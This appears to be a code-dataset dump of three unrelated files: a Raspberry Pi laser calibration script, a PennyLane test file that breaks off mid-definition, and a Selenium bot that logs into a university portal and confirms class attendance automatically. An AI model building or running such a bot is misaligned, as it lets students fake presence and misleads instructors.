np.savetxt('points_cloud.csv', np.array(points_cloud), fmt=\"%s\",delimiter=',')\n sys.exit()\n else :\n points_cloud.append(line)\n \n #mode 2: calibration \n while mode == 2 :\n # Turn off laser\n GPIO.output(tll, GPIO.HIGH)\n # Capture frame\n _, frame = cap.read()\n hsv_image = cv2.cvtColor(frame, cv2.COLOR_BGR2HSV)\n green = cv2.inRange(hsv_image, lower_green, upper_green)\n # remove noise\n kernel = np.ones((5,5),np.uint8)\n green = cv2.morphologyEx(green, cv2.MORPH_CLOSE, kernel)\n cnts,_ = cv2.findContours(green,cv2.RETR_EXTERNAL,cv2.CHAIN_APPROX_SIMPLE) \n if len(cnts) != 0:\n # find the biggest countour (c) by the area\n c = max(cnts, key = cv2.contourArea) \n (X, Y, W, H) = cv2.boundingRect(c)\n cv2.rectangle(frame, (X, Y), (X + W, Y + H), (255, 0, 0), 3)\n #if there are data in serial port \n if ser.in_waiting > 0: \n line = ser.readline().decode('utf-8').rstrip()\n print(line)\n # The servos are in position \n if line == \"In position\":\n # Do matching when servos are in position\n if len(cnts) != 0:\n # compute the center of the contour\n u = round((X + W) / 2)\n v = round((Y + H) / 2)\n print(u,v)\n # (x, y, z) in 3D model\n # (u, v) in frame\n x = points[int(random_index),0]\n y = points[int(random_index),1]\n z = points[int(random_index),2]\n print(x,y,z)\n A = Matrix(x,y,z,u,v,A)\n cnt = cnt + 1\n ServoReady = 1\n else :\n raise ValueError(\"No object detected!\")\n # Stop sending command to servos when ServoReady = 0 \n if ServoReady == 1:\n if cnt < number_of_samples :\n #get the random points on the roof for calibration\n random_index = random.randrange(round(rawM.size/5*0.95),round(rawM.size/5)) \n pan,tilt = GetPanTilt(random_index,rawM) \n MotorControl(pan,tilt) \n ServoReady = 0\n else : \n GPIO.output(tll, GPIO.HIGH)\n M = sol_svd(A)\n print(M)\n np.savetxt('Calibration_matrix.csv', np.array(M), fmt=\"%s\",delimiter=',')\n servoReady = 1\n cnt = 0 \n mode = 3 \n \n #mode 3: Test\n while mode == 3 :\n # Capture frame\n _, frame = cap.read()\n hsv_image = cv2.cvtColor(frame, cv2.COLOR_BGR2HSV)\n green = cv2.inRange(hsv_image, lower_green, upper_green)\n # remove noise\n kernel = np.ones((5,5),np.uint8)\n green = cv2.morphologyEx(green, cv2.MORPH_CLOSE, kernel)\n cnts,_ = cv2.findContours(green,cv2.RETR_EXTERNAL,cv2.CHAIN_APPROX_SIMPLE) \n if len(cnts) != 0:\n # find the biggest countour (c) by the area\n c = max(cnts, key = cv2.contourArea) \n (X, Y, W, H) = cv2.boundingRect(c)\n cv2.rectangle(frame, (X, Y), (X + W, Y + H), (255, 0, 0), 3) \n if ser.in_waiting > 0: \n line = ser.readline().decode('utf-8').rstrip()\n print(line)\n # The servos are in position \n if line == \"In position\":\n # Do matching when servos are in position\n if len(cnts) != 0:\n # compute the center of the contour\n u = round((X + W) / 2)\n v = round((Y + H) / 2)\n # get the mapped 3D coordinate\n p3 = get_corr_point(M, u, v) \n p3 = np.real(p3)\n print(u,v)\n print(p3)\n # \"real\" 3D coordinate, from point clouds \n x = points[int(random_index),0] \n y = points[int(random_index),1]\n z = points[int(random_index),2]\n print(x,y,z)\n p3_real = np.array([[x], [y], [z]])\n diff.append(p3-p3_real) \n cnt = cnt + 1\n ServoReady = 1\n else :\n # raise error if nothing is detected by the camera\n raise ValueError(\"No object detected!\")\n # Stop sending command to servos\n # when ServoReady = 0 \n if ServoReady == 1:\n if cnt == 0 :\n #get the random points on the roof for calibration verification\n random_index = random.randrange(round(rawM.size/5*0.95),round(rawM.size/5)) \n pan,tilt = GetPanTilt(random_index,rawM) \n MotorControl(pan,tilt) \n ServoReady = 0\n elif cnt == 1 :\n random_index = random.randrange(round(rawM.size/5*0.95),round(rawM.size/5))\n pan,tilt = GetPanTilt(random_index,rawM) \n MotorControl(pan,tilt) \n ServoReady = 0\n elif cnt == 2 :\n random_index = random.randrange(round(rawM.size/5*0.95),round(rawM.size/5))\n pan,tilt = GetPanTilt(random_index,rawM) \n MotorControl(pan,tilt) \n ServoReady = 0\n elif cnt == 3 :\n random_index = random.randrange(round(rawM.size/5*0.95),round(rawM.size/5))\n pan,tilt = GetPanTilt(random_index,rawM) \n MotorControl(pan,tilt) \n ServoReady = 0\n elif cnt == 4 :\n random_index = random.randrange(round(rawM.size/5*0.95),round(rawM.size/5))\n pan,tilt = GetPanTilt(random_index,rawM) \n MotorControl(pan,tilt) \n ServoReady = 0\n elif cnt == 5 :\n random_index = random.randrange(round(rawM.size/5*0.95),round(rawM.size/5))\n pan,tilt = GetPanTilt(random_index,rawM) \n MotorControl(pan,tilt) \n ServoReady = 0 \n elif cnt == 6 :\n ServoReady = 0\n print(diff)\n # Turn off laser\n GPIO.output(tll, GPIO.LOW)\n sys.exit()\n \n \n# beetle test \n while mode == 4 :\n \n GPIO.output(tll,GPIO.HIGH)\n direction = np.array([0,90/180*math.pi])\n phi = 0 #The angle between the movement direction of the dung beetle and the positive X axis\n beetle_moving_direction = phi\n direction = direction + phi # Rotate \n if ser.in_waiting > 0: \n line = ser.readline().decode('utf-8').rstrip()\n print(line)\n # The servos are in position \n if line == \"In position\":\n cnt = cnt + 1\n ServoReady = 1\n end = datetime.datetime.now()\n period = end - start\n print(int(period.total_seconds()*1000),\"ms\")\n print(\"in position\")\n \n if ServoReady == 1:\n if cnt < 20:\n random_x = random.randrange(0,640)\n random_y = random.randrange(0,480)\n print(\"location on image \",random_x, random_y)\n random_location = get_corr_point(M, random_x, random_y)\n beetle_location_x = random_location[0]\n beetle_location_y = random_location[1]\n beetle_location = [beetle_location_x,beetle_location_y]; # Detect the beetle location\n print(\"beetle_location\",beetle_location)\n new_points = ConvertXYZ(beetle_location,points)\n angle_distance = GetAngle(new_points) #new_points \n [index,laser_target] = GetLaserTarget(direction,angle_distance,points)\n print(\"laser target \",laser_target)\n pan,tilt = GetPanTilt(index,rawM)\n start = datetime.datetime.now()\n MotorControl(pan,tilt)\n ServoReady = 0\n \n \n \n \n", "repo_name": "eziohhd/EDAN70_CS_PROJECT", "sub_path": "Raspberry pi/calibration_test.py", "file_name": "calibration_test.py", "file_ext": "py", "file_size_in_byte": 13503, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "numpy.array", "line_number": 32, "usage_type": "call"}, {"api_name": "numpy.linalg.eig", "line_number": 34, "usage_type": "call"}, {"api_name": "numpy.linalg", "line_number": 34, "usage_type": "attribute"}, {"api_name": "numpy.dot", "line_number": 34, "usage_type": "call"}, {"api_name": "numpy.argmin", "line_number": 36, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 54, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 59, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 61, "usage_type": "call"}, {"api_name": "cv2.VideoCapture", "line_number": 75, "usage_type": "call"}, {"api_name": "RPi.GPIO.setwarnings", "line_number": 90, "usage_type": "call"}, {"api_name": "RPi.GPIO", "line_number": 90, "usage_type": "name"}, {"api_name": "RPi.GPIO.setmode", "line_number": 91, "usage_type": "call"}, {"api_name": "RPi.GPIO", "line_number": 91, "usage_type": "name"}, {"api_name": "RPi.GPIO.BCM", "line_number": 91, "usage_type": "attribute"}, {"api_name": "RPi.GPIO.setup", "line_number": 92, "usage_type": "call"}, {"api_name": "RPi.GPIO", "line_number": 92, "usage_type": "name"}, {"api_name": "RPi.GPIO.OUT", "line_number": 92, "usage_type": "attribute"}, {"api_name": "RPi.GPIO.setup", "line_number": 93, "usage_type": "call"}, {"api_name": "RPi.GPIO", "line_number": 93, "usage_type": "name"}, {"api_name": "RPi.GPIO.OUT", "line_number": 93, "usage_type": "attribute"}, {"api_name": "RPi.GPIO.output", "line_number": 94, "usage_type": "call"}, {"api_name": "RPi.GPIO", "line_number": 94, "usage_type": "name"}, {"api_name": "RPi.GPIO.HIGH", "line_number": 94, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 96, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 97, "usage_type": "call"}, {"api_name": "serial.Serial", "line_number": 98, "usage_type": "call"}, {"api_name": "inquirer.List", "line_number": 108, "usage_type": "call"}, {"api_name": "inquirer.prompt", "line_number": 112, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 120, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 129, "usage_type": "call"}, {"api_name": "numpy.savetxt", "line_number": 143, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 143, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 144, "usage_type": "call"}, {"api_name": "RPi.GPIO.output", "line_number": 151, "usage_type": "call"}, {"api_name": "RPi.GPIO", "line_number": 151, "usage_type": "name"}, {"api_name": "RPi.GPIO.HIGH", "line_number": 151, "usage_type": "attribute"}, {"api_name": "cv2.cvtColor", "line_number": 154, "usage_type": "call"}, {"api_name": "cv2.COLOR_BGR2HSV", "line_number": 154, "usage_type": "attribute"}, {"api_name": "cv2.inRange", "line_number": 155, "usage_type": "call"}, {"api_name": "numpy.ones", "line_number": 157, "usage_type": "call"}, {"api_name": "numpy.uint8", "line_number": 157, "usage_type": "attribute"}, {"api_name": "cv2.morphologyEx", "line_number": 158, "usage_type": "call"}, {"api_name": "cv2.MORPH_CLOSE", "line_number": 158, "usage_type": "attribute"}, {"api_name": "cv2.findContours", "line_number": 159, "usage_type": "call"}, {"api_name": "cv2.RETR_EXTERNAL", "line_number": 159, "usage_type": "attribute"}, {"api_name": "cv2.CHAIN_APPROX_SIMPLE", "line_number": 159, "usage_type": "attribute"}, {"api_name": "cv2.contourArea", "line_number": 162, "usage_type": "attribute"}, {"api_name": "cv2.boundingRect", "line_number": 163, "usage_type": "call"}, {"api_name": "cv2.rectangle", "line_number": 164, "usage_type": "call"}, {"api_name": "random.randrange", "line_number": 192, "usage_type": "call"}, {"api_name": "RPi.GPIO.output", "line_number": 197, "usage_type": "call"}, {"api_name": "RPi.GPIO", "line_number": 197, "usage_type": "name"}, {"api_name": "RPi.GPIO.HIGH", "line_number": 197, "usage_type": "attribute"}, {"api_name": "numpy.savetxt", "line_number": 200, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 200, "usage_type": "call"}, {"api_name": "cv2.cvtColor", "line_number": 209, "usage_type": "call"}, {"api_name": "cv2.COLOR_BGR2HSV", "line_number": 209, "usage_type": "attribute"}, {"api_name": "cv2.inRange", "line_number": 210, "usage_type": "call"}, {"api_name": "numpy.ones", "line_number": 212, "usage_type": "call"}, {"api_name": "numpy.uint8", "line_number": 212, "usage_type": "attribute"}, {"api_name": "cv2.morphologyEx", "line_number": 213, "usage_type": "call"}, {"api_name": "cv2.MORPH_CLOSE", "line_number": 213, "usage_type": "attribute"}, {"api_name": "cv2.findContours", "line_number": 214, "usage_type": "call"}, {"api_name": "cv2.RETR_EXTERNAL", "line_number": 214, "usage_type": "attribute"}, {"api_name": "cv2.CHAIN_APPROX_SIMPLE", "line_number": 214, "usage_type": "attribute"}, {"api_name": "cv2.contourArea", "line_number": 217, "usage_type": "attribute"}, {"api_name": "cv2.boundingRect", "line_number": 218, "usage_type": "call"}, {"api_name": "cv2.rectangle", "line_number": 219, "usage_type": "call"}, {"api_name": "numpy.real", "line_number": 232, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 240, "usage_type": "call"}, {"api_name": "random.randrange", "line_number": 252, "usage_type": "call"}, {"api_name": "random.randrange", "line_number": 257, "usage_type": "call"}, {"api_name": "random.randrange", "line_number": 262, "usage_type": "call"}, {"api_name": "random.randrange", "line_number": 267, "usage_type": "call"}, {"api_name": "random.randrange", "line_number": 272, "usage_type": "call"}, {"api_name": "random.randrange", "line_number": 277, "usage_type": "call"}, {"api_name": "RPi.GPIO.output", "line_number": 285, "usage_type": "call"}, {"api_name": "RPi.GPIO", "line_number": 285, "usage_type": "name"}, {"api_name": "RPi.GPIO.LOW", "line_number": 285, "usage_type": "attribute"}, {"api_name": "sys.exit", "line_number": 286, "usage_type": "call"}, {"api_name": "RPi.GPIO.output", "line_number": 292, "usage_type": "call"}, {"api_name": "RPi.GPIO", "line_number": 292, "usage_type": "name"}, {"api_name": "RPi.GPIO.HIGH", "line_number": 292, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 293, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 304, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 304, "usage_type": "attribute"}, {"api_name": "random.randrange", "line_number": 311, "usage_type": "call"}, {"api_name": "random.randrange", "line_number": 312, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 324, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 324, "usage_type": "attribute"}]} +{"seq_id": "37590141988", "text": "from selenium import webdriver \nfrom selenium.webdriver.firefox.options import Options \nfrom selenium.webdriver.common.by import By\nfrom selenium.common.exceptions import TimeoutException\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.common.exceptions import WebDriverException\nfrom selenium.webdriver.support import expected_conditions as EC\nimport math\nimport requests\nimport time\n\n# Akun USK untuk Login\nNIM = 'NIM'\nPASS = 'PASS'\nMAX_WAIT_TIME = 20 # waktu tunggu maksimal dalam seconds\n\n# Inisialisasi variabel status untuk flow dependency\nstatus = True\n# Fungsi untuk mengklik elemen by CSS SELECTOR setelah menunggu\ndef click_by_css(css_selector, label):\n global status # menggunakan variable status mejadi global\n try:\n WebDriverWait(driver, MAX_WAIT_TIME).until(\n EC.element_to_be_clickable((By.CSS_SELECTOR, css_selector))\n ).click()\n print(f\"Tombol '{label}' di klik\")\n except TimeoutException:\n print(f\"Tombol '{label}' tidak ditemukan atau tidak dapat diklik.\")\n status = False # Set status menjadi false jika tombol gagal di klik\n\n# Fungsi untuk mengisi teks pada kolom berdasarkan atribut name dan nilainya \ndef fill_text_by_name(value_of_name, text_to_fill):\n try:\n elemen = WebDriverWait(driver, MAX_WAIT_TIME).until(\n EC.presence_of_element_located((By.NAME, value_of_name))\n )\n elemen.clear()\n elemen.send_keys(text_to_fill)\n except TimeoutException:\n print(f\"Elemen dengan atribut 'NAME'='{value_of_name}' tidak ditemukan atau tidak dapat diisi.\")\n\n# Fungsi untuk mencetak teks dari elemen dengan selector CSS\ndef print_text_by_css(css_selector, message=\"\"):\n try:\n elemen = WebDriverWait(driver, MAX_WAIT_TIME).until(\n EC.presence_of_element_located((By.CSS_SELECTOR, css_selector))\n )\n teks_elemen = elemen.text\n print(f\"{message}{teks_elemen}\")\n except TimeoutException:\n print(f\"'{css_selector}' tidak ditemukan.\")\n\n# Fungsi untuk mencetak teks dari elemen dengan selector CSS\ndef get_text_by_css(css_selector):\n try:\n elemen = WebDriverWait(driver, MAX_WAIT_TIME).until(\n EC.presence_of_element_located((By.CSS_SELECTOR, css_selector))\n )\n text = elemen.text\n return text\n except TimeoutException:\n return None\n\n# Fungsi untuk membuka atau pindah url baru\ndef go_to_url(url):\n # opening the target website in the browser \n driver.get(url)\n #printing the target website url and title\n print(f\"Membuka '{driver.current_url}' \")\n\n# Fungsi untuk keluar program\ndef exit_program(message):\n print(message, \"Exiting..\")\n exit()\n\n# Fungsi untuk memeriksa koneksi internet\ndef is_internet_available(url=\"https://google.com\"):\n try:\n # Cobalah menghubungi server Google\n response = requests.get(url, timeout=10000)\n return True\n except requests.ConnectionError:\n return False\n\n# the target website \nurl_login = \"https://simkuliah.usk.ac.id/index.php/login\" \nurl_absensi = \"https://simkuliah.usk.ac.id/index.php/absensi\"\n\n\n# the interface for turning on headless mode \noptions = Options() \noptions.add_argument(\"-headless\") \n\n# Inisialisasi Elemen\n# cara : inspect element web pages, get the button or text field, right click, copy, choose css selector or xpath or whatever you want.\nlogin = \"div.row:nth-child(5) > div:nth-child(1) > button:nth-child(1)\" #css selector\n# absensi = \"a[href='https://simkuliah.usk.ac.id/index.php/absensi']\"\nkonfirmasi_kehadiran = \"#konfirmasi-kehadiran\" #css selector\nkonfirmasi = \"body > div.sweet-alert.showSweetAlert.visible > div.sa-button-container > div > button\"\nnama_akun = \"#pcoded > div.pcoded-container.navbar-wrapper > nav > div > div.navbar-container.container-fluid > div > ul.nav-right > li.user-profile.header-notification > a > span\"\ncheck_absen = \"#pcoded > div.pcoded-container.navbar-wrapper > div > div > div.pcoded-content > div > div > div > div.page-body > div > div > div > div > div:nth-child(1) > div > div > p\"\nvalid_alert = \"body > section > div > div > div > div.login-card.card-block.auth-body > form > div.auth-box > div.alert.alert-danger.icons-alert\"\nmk_sekarang = \"#pcoded > div.pcoded-container.navbar-wrapper > div > div > div.pcoded-content > div > div > div > div.page-body > div > div > div > div.card-header > h5\"\ninfo_absensi = \"#pcoded > div.pcoded-container.navbar-wrapper > div > div > div.pcoded-content > div > div > div > div.page-body > div > div > div > div.card-block > div > div:nth-child(1) > div > p\"\n\n\ntry:\n # Check ketersediaan internet\n if is_internet_available():\n # using Firefox headless webdriver to secure connection to Firefox \n with webdriver.Firefox(options=options) as driver:\n \n go_to_url(url_login) # pergi ke halaman login\n # Mengisi username, password and signin elements\n fill_text_by_name(\"username\", NIM)\n fill_text_by_name(\"password\", PASS)\n \n # Flow click tombol\n # Flow Login\n if status:\n click_by_css(login, \"Login\") \n # Jika berhasil masuk\n nama = get_text_by_css(nama_akun)\n if nama:\n length = 6 + len(nama)\n print(\"Login Berhasil!\")\n print('='* math.ceil((length-6)/2) ,\"INFO\", '='* math.ceil((length-6)/2) )\n print(\"Nama:\",nama)\n print(\"NIM:\",NIM)\n print('='*(length+1))\n \n # Flow pergi ke halaman absensi \n go_to_url(url_absensi) # pergi ke halaman absensi\n check = get_text_by_css(check_absen) # Mendapatkan teks jika absen belum tersedia\n \n # Jika absen belum tersedia maka program berhenti\n if \"sudah\" in check.lower():\n exit_program(check) \n else:\n mataKuliah = get_text_by_css(mk_sekarang) # Dapatkan mata kuliah yang sedang berlangsung\n info_absensi_check = get_text_by_css(info_absensi) # dapatkan teks anda sudah absen atau belum\n\n if mataKuliah and info_absensi_check:\n print(\"Mata Kuliah:\", mataKuliah)\n\n # dapatkan kata kedua yaitu belum atau sudah dari info_absensi_check\n info_c = info_absensi_check.split()\n if (info_c[1].lower() == \"belum\"):\n print(info_absensi_check)\n # click_by_css(konfirmasi_kehadiran, \"konfirmasi kehadiran\")\n # click_by_css(konfirmasi, \"konfirmasi absen\")\n time.sleep(3.0)\n driver.find_element(By.CSS_SELECTOR, konfirmasi_kehadiran).click()\n time.sleep(3.0)\n driver.find_element(By.CSS_SELECTOR, konfirmasi).click()\n\n go_to_url(url_absensi) # pergi ke halaman absensi\n info_absensi_check = get_text_by_css(info_absensi) # dapatkan teks anda sudah absen atau belum\n info_c = info_absensi_check.split()\n if (info_c[1].lower() == \"sudah\"):\n exit_program(f\"Absensi {mk_sekarang}\\nberhasil!\")\n else:\n exit_program(info_absensi_check)\n # jika selain belum\n else:\n exit_program(info_absensi_check)\n\n else:\n exit_program(\"Gagal mengindeks MK dan Info_absen\")\n \n # Flow untuk klik tombol hadir\n # click_by_css(hadir, \"Hadir\")\n # click_by_css(konfirmasi, \"Konfirmasi\")\n \n else:\n # Menampilkan kesalahan jika username atau pass salah\n if NIM and PASS: \n error_alert = get_text_by_css(valid_alert)\n exit_program(error_alert)\n\n exit_program(\"Gagal login!\")\n \n driver.close()\n else:\n gagal = \"Gagal Terhubung. Coba lagi nanti.\"\n exit_program(gagal)\nexcept WebDriverException as e:\n print(\"Terjadi kesalahan:\", str(e))\n", "repo_name": "riparuk/skrip-malas", "sub_path": "autoAbsenSimkuliah.py", "file_name": "autoAbsenSimkuliah.py", "file_ext": "py", "file_size_in_byte": 8641, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "selenium.webdriver.support.ui.WebDriverWait", "line_number": 23, "usage_type": "call"}, {"api_name": "selenium.webdriver.support.expected_conditions.element_to_be_clickable", "line_number": 24, "usage_type": "call"}, {"api_name": "selenium.webdriver.support.expected_conditions", "line_number": 24, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.by.By.CSS_SELECTOR", "line_number": 24, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 24, "usage_type": "name"}, {"api_name": "selenium.common.exceptions.TimeoutException", "line_number": 27, "usage_type": "name"}, {"api_name": "selenium.webdriver.support.ui.WebDriverWait", "line_number": 34, "usage_type": "call"}, {"api_name": "selenium.webdriver.support.expected_conditions.presence_of_element_located", "line_number": 35, "usage_type": "call"}, {"api_name": "selenium.webdriver.support.expected_conditions", "line_number": 35, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.by.By.NAME", "line_number": 35, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 35, "usage_type": "name"}, {"api_name": "selenium.common.exceptions.TimeoutException", "line_number": 39, "usage_type": "name"}, {"api_name": "selenium.webdriver.support.ui.WebDriverWait", "line_number": 45, "usage_type": "call"}, {"api_name": "selenium.webdriver.support.expected_conditions.presence_of_element_located", "line_number": 46, "usage_type": "call"}, {"api_name": "selenium.webdriver.support.expected_conditions", "line_number": 46, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.by.By.CSS_SELECTOR", "line_number": 46, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 46, "usage_type": "name"}, {"api_name": "selenium.common.exceptions.TimeoutException", "line_number": 50, "usage_type": "name"}, {"api_name": "selenium.webdriver.support.ui.WebDriverWait", "line_number": 56, "usage_type": "call"}, {"api_name": "selenium.webdriver.support.expected_conditions.presence_of_element_located", "line_number": 57, "usage_type": "call"}, {"api_name": "selenium.webdriver.support.expected_conditions", "line_number": 57, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.by.By.CSS_SELECTOR", "line_number": 57, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 57, "usage_type": "name"}, {"api_name": "selenium.common.exceptions.TimeoutException", "line_number": 61, "usage_type": "name"}, {"api_name": "requests.get", "line_number": 80, "usage_type": "call"}, {"api_name": "requests.ConnectionError", "line_number": 82, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.firefox.options.Options", "line_number": 91, "usage_type": "call"}, {"api_name": "selenium.webdriver.Firefox", "line_number": 111, "usage_type": "call"}, {"api_name": "selenium.webdriver", "line_number": 111, "usage_type": "name"}, {"api_name": "math.ceil", "line_number": 127, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 152, "usage_type": "call"}, {"api_name": "selenium.webdriver.common.by.By.CSS_SELECTOR", "line_number": 153, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 153, "usage_type": "name"}, {"api_name": "time.sleep", "line_number": 154, "usage_type": "call"}, {"api_name": "selenium.webdriver.common.by.By.CSS_SELECTOR", "line_number": 155, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 155, "usage_type": "name"}, {"api_name": "selenium.common.exceptions.WebDriverException", "line_number": 187, "usage_type": "name"}]} +{"seq_id": "31505617542", "text": "import copy\nimport pytest\nimport numpy as np\nfrom pennylane import numpy as pnp\nimport pennylane as qml\n\n\nclass TestSelect:\n \"\"\"Tests that the template defines the correct decomposition.\"\"\"\n\n @pytest.mark.parametrize(\n (\"ops\", \"control\", \"expected_gates\", \"n_wires\"),\n [\n (\n [qml.PauliX(wires=0), qml.PauliY(wires=0)],\n [1],\n [\n qml.ctrl(qml.PauliX(wires=0), control=1, control_values=0),\n qml.ctrl(qml.PauliY(wires=0), control=1),\n ],\n 2,\n ),\n (\n [qml.PauliX(wires=0), qml.Identity(wires=0), qml.PauliZ(wires=0)],\n [1, 2],\n [\n qml.ctrl(qml.PauliX(wires=0), control=[1, 2], control_values=[0, 0]),\n qml.ctrl(qml.PauliZ(wires=0), control=[1, 2], control_values=[1, 0]),\n ],\n 3,\n ),\n (\n [\n qml.PauliX(wires=0),\n qml.Identity(wires=0),\n qml.Identity(wires=0),\n qml.RX(0.3, wires=0),\n ],\n [1, 2],\n [\n qml.ctrl(qml.PauliX(wires=0), control=[1, 2], control_values=[0, 0]),\n qml.ctrl(qml.RX(0.3, wires=0), control=[1, 2], control_values=[1, 1]),\n ],\n 3,\n ),\n (\n [qml.PauliX(wires=\"a\"), qml.RX(0.7, wires=\"b\")],\n [\"c\", 1],\n [\n qml.ctrl(qml.PauliX(wires=\"a\"), control=[\"c\", 1], control_values=[0, 0]),\n qml.ctrl(qml.RX(0.7, wires=\"b\"), control=[\"c\", 1], control_values=[0, 1]),\n ],\n [\"a\", \"b\", \"c\", 1],\n ),\n ],\n )\n def test_operation_result(self, ops, control, expected_gates, n_wires):\n \"\"\"Test the correctness of the Select template output.\"\"\"\n dev = qml.device(\"default.qubit\", wires=n_wires)\n\n @qml.qnode(dev)\n def circuit1():\n for wire in control:\n qml.Hadamard(wires=wire)\n\n qml.Select(ops, control)\n return qml.state()\n\n @qml.qnode(dev)\n def circuit2():\n for wire in control:\n qml.Hadamard(wires=wire)\n for op in expected_gates:\n qml.apply(op)\n return qml.state()\n\n assert np.allclose(circuit1(), circuit2())\n\n @pytest.mark.parametrize(\n (\"ops\", \"control\", \"expected_gates\"),\n [\n (\n [qml.PauliX(wires=0), qml.PauliY(wires=0)],\n [1],\n [\n qml.ctrl(qml.PauliX(wires=0), control=1, control_values=0),\n qml.ctrl(qml.PauliY(wires=0), control=1),\n ],\n ),\n (\n [qml.RX(0.5, wires=0), qml.RY(0.7, wires=1)],\n [2],\n [\n qml.ctrl(qml.RX(0.5, wires=0), control=2, control_values=0),\n qml.ctrl(qml.RY(0.7, wires=1), control=2),\n ],\n ),\n (\n [\n qml.RX(0.5, wires=0),\n qml.RY(0.7, wires=1),\n qml.RZ(0.3, wires=1),\n qml.PauliX(wires=2),\n ],\n [3, 4],\n [\n qml.ctrl(qml.RX(0.5, wires=0), control=[3, 4], control_values=[0, 0]),\n qml.ctrl(qml.RY(0.7, wires=1), control=[3, 4], control_values=[0, 1]),\n qml.ctrl(qml.RZ(0.3, wires=1), control=[3, 4], control_values=[1, 0]),\n qml.ctrl(qml.PauliX(wires=2), control=[3, 4], control_values=[1, 1]),\n ],\n ),\n ],\n )\n def test_queued_ops(self, ops, control, expected_gates):\n \"\"\"Test the correctness of the Select template queued operations.\"\"\"\n with qml.tape.OperationRecorder() as recorder:\n qml.Select(ops, control=control)\n\n select_ops = recorder.expand().operations\n\n assert [op.name for op in select_ops] == [op.name for op in expected_gates]\n assert [op.wires for op in select_ops] == [op.wires for op in expected_gates]\n\n @pytest.mark.parametrize(\n (\"ops\", \"control\", \"expected_gates\"),\n [\n (\n [qml.PauliX(wires=0), qml.PauliY(wires=0)],\n [1],\n [\n qml.ctrl(qml.PauliX(wires=0), control=1, control_values=0),\n qml.ctrl(qml.PauliY(wires=0), control=1),\n ],\n ),\n (\n [qml.RX(0.5, wires=0), qml.RY(0.7, wires=1)],\n [2],\n [\n qml.ctrl(qml.RX(0.5, wires=0), control=2, control_values=0),\n qml.ctrl(qml.RY(0.7, wires=1), control=2),\n ],\n ),\n (\n [\n qml.RX(0.5, wires=0),\n qml.RY(0.7, wires=1),\n qml.RZ(0.3, wires=1),\n qml.PauliX(wires=2),\n ],\n [3, 4],\n [\n qml.ctrl(qml.RX(0.5, wires=0), control=[3, 4], control_values=[0, 0]),\n qml.ctrl(qml.RY(0.7, wires=1), control=[3, 4], control_values=[0, 1]),\n qml.ctrl(qml.RZ(0.3, wires=1), control=[3, 4], control_values=[1, 0]),\n qml.ctrl(qml.PauliX(wires=2), control=[3, 4], control_values=[1, 1]),\n ],\n ),\n ],\n )\n def test_decomposition(self, ops, control, expected_gates):\n \"\"\"Unit test checking that compute_decomposition and decomposition work as expected.\"\"\"\n op = qml.Select(ops, control=control)\n select_decomposition = op.decomposition()\n select_compute_decomposition = op.compute_decomposition(ops, control)\n\n assert all(qml.equal(op1, op2) for op1, op2 in zip(select_decomposition, expected_gates))\n assert all(\n qml.equal(op1, op2) for op1, op2 in zip(select_compute_decomposition, expected_gates)\n )\n\n # pylint: disable=protected-access\n def test_flatten_unflatten(self):\n \"\"\"Test that the _flatten and _unflatten functions work as expected.\"\"\"\n ops = [qml.PauliX(wires=2), qml.PauliX(wires=3), qml.PauliY(wires=2), qml.SWAP([2, 3])]\n op = qml.Select(ops, control=[0, 1])\n data, metadata = op._flatten()\n\n assert hash(metadata)\n\n assert len(data) == len(ops)\n assert all(qml.equal(op1, op2) for op1, op2 in zip(data, ops))\n\n assert metadata == op.control\n\n new_op = type(op)._unflatten(*op._flatten())\n assert all(qml.equal(op1, op2) for op1, op2 in zip(op.ops, new_op.ops))\n assert op.wires == new_op.wires\n assert op.control == new_op.control\n assert op.target_wires == new_op.target_wires\n assert op is not new_op\n\n def test_copy(self):\n \"\"\"Test that the copy function of Select works correctly.\"\"\"\n ops = [qml.PauliX(wires=2), qml.RX(0.2, wires=3), qml.PauliY(wires=2), qml.SWAP([2, 3])]\n op = qml.Select(ops, control=[0, 1])\n op_copy = copy.copy(op)\n\n assert qml.equal(op, op_copy)\n\n\nclass TestErrorMessages:\n \"\"\"Test that the correct errors are raised\"\"\"\n\n @pytest.mark.parametrize(\n (\"ops\", \"control\", \"msg_match\"),\n [\n (\n [qml.PauliX(wires=1), qml.PauliY(wires=0), qml.PauliZ(wires=0)],\n [1, 2],\n \"Control wires should be different from operation wires.\",\n ),\n (\n [qml.PauliX(wires=2)] * 4,\n [1, 2, 3],\n \"Control wires should be different from operation wires.\",\n ),\n (\n [qml.PauliX(wires=\"a\"), qml.PauliY(wires=\"b\")],\n [\"a\"],\n \"Control wires should be different from operation wires.\",\n ),\n ],\n )\n def 